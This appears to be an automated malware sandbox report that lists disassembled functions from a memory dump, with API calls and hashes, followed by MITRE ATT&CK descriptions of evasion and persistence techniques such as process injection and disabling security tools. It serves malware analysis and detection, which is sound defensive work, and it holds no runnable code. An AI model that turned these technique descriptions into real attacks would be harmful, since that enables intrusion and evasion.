Part of subcall function 00007FF7BB2513F4: CompareStringW.KERNEL32 ref: 00007FF7BB25145A

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
Instruction ID: 6edbc8c1f937381876b07aba911e8bf2ff9e60b5c6ffda15b17317aaef736265
Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
Instruction Fuzzy Hash: 5261F111E0C64781FA60BA2DC4152FAD691BF67BD4F940531EF8E4AEFDEE6CE4418221

Function 00007FF7BB251870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB24E948: ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24E974
Part of subcall function 00007FF7BB24E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7BB24E993
Part of subcall function 00007FF7BB24E948: DeleteCriticalSection.KERNEL32 ref: 00007FF7BB24E9AA
Part of subcall function 00007FF7BB24E948: CloseHandle.KERNEL32 ref: 00007FF7BB24E9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB251ACB

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1624603282-0
Opcode ID: c684d41f894cbce08ec7c0bd704efad723705596a2152b884b75cef801a19205
Instruction ID: 4fd8bd5a28bdaa820444fd947e91050d79243328e5870a1190276a4a9ef9d396
Opcode Fuzzy Hash: c684d41f894cbce08ec7c0bd704efad723705596a2152b884b75cef801a19205
Instruction Fuzzy Hash: 95619362715A8552EE08EB6DD5941FCB365FF52F94B944132EB2D07AE9CF38E460C310

Function 00007FF7BB23EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB23EEB8

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d66c1927c3180f61a8f193b24c26b61e470edbacf4cd296cf9515bfe84d3ca03
Instruction ID: c8d1f70a977f6ca3d580922aa722530070077fe7954c66e407779898747f50b5
Opcode Fuzzy Hash: d66c1927c3180f61a8f193b24c26b61e470edbacf4cd296cf9515bfe84d3ca03
Instruction Fuzzy Hash: 3E51A462A0864644EA14BB2D94453EDA751FB67BD4F840136EF5D077BACE3DE489C330

Function 00007FF7BB241794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24187D

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 3598c53805056eb61f078e6229763af278814205c6aa80cf8595c445c1d2a3c6
Instruction ID: 4b542d2bdb495a05146bf4920f59d853e9f374579553940709a6ae3e7b3fd1ed
Opcode Fuzzy Hash: 3598c53805056eb61f078e6229763af278814205c6aa80cf8595c445c1d2a3c6
Instruction Fuzzy Hash: 50411762B18A9142EA14AA1FEA013B9E651FB59FC0F848535EF4D4BFAEDF7CD4518300

Function 00007FF7BB242F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2430C8

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
Instruction ID: da649dc8f7ca41b267103683b2a1dd5bd43bbef71d023c2db8b247c22621060a
Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
Instruction Fuzzy Hash: 7741F562A18B4181EF14AB2DE5453B9B360FB66BD4F941234EF5D07ABDDF3DE4408620

Function 00007FF7BB23129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB231396

Part of subcall function 00007FF7BB231F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB231F89

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
Instruction ID: dd31c27fd006693e0914d3082ba244ad0c6faec0201d578a0e4684ca50d748ae
Opcode Fuzzy Hash: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
Instruction Fuzzy Hash: F221B722A0875189EA146F5DA4002F9A250FB26BF0F940730DF3D47BE9DE7CE4558315

Function 00007FF7BB232C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB232D77

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9569f84151419388535ac001b279a0a92bf5c5167c25002bdc660d405c57631f
Instruction ID: ac40a460d73d7853af2ff4a74b0ac4bfe13a62656d27169fe628a219d06ee5a4
Opcode Fuzzy Hash: 9569f84151419388535ac001b279a0a92bf5c5167c25002bdc660d405c57631f
Instruction Fuzzy Hash: DA214F22B1498666EA08FB2DD5543F8A324FB66784FD44431EB1D476BADF3CA568C320

Function 00007FF7BB27124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB271280

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: d13a21de9cd9e7756d05e0bb2f4ac88c2020987a04c4c3b353ff451620e4f51a
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: 1C117231D1C65282F710AF5EA4412B9E2A4FF66380FD40135EF8D876A9DF2CE8008728

Function 00007FF7BB233AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB233B6C

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
Instruction ID: 4383382c34e37d06b7c179bb3c9fdba64ebd7cae3f4d6f2a536a8a584061f15b
Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
Instruction Fuzzy Hash: B501A162E18AC585FA11A72CE4452A9B362FBAA790FC05231EF9C07ABDDF2CD1448614

Function 00007FF7BB26FA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7BB26FA59

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: f5114f49e7f24e79e9f229e31b82f51fca4591d100d1c70a44b2286a9c8c229c
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: 54F04955B0A20745FE547A6E99122F492907F7FB80FD85430CF4FCA3A9EE2CAA814230

Function 00007FF7BB26D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7BB26D98A

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: 149675e1417fb860891826fffe6b6312b2e53e9f272e674c09c7b58b80bd49c3
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: 63F03A50E0A24B44FF147ABE58112F492907F6E7A0FC81630DF6FCA2E9DE1CA4409130

Function 00007FF7BB2420D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7BB24207E), ref: 00007FF7BB2420F6

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: 6a4d6b3dd631a2365c8625d8299033fc491d982832264e4c6243f8c6b9596b69
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: 95F0A921A1854245FB249B3DD4413B9A660F726B78F884334DF3C055E9CF28D8958720

Function 00007FF7BB242490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7BB2424A2

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: 1088ee19880b8a70c13581687e66d79f9d69ce7df2274c89c0f667b127b323a2
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: 24D01216E1984182DD10A73F98510BC6350FFA3735FE40B30DB3E82AF5CE1D9496A325

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

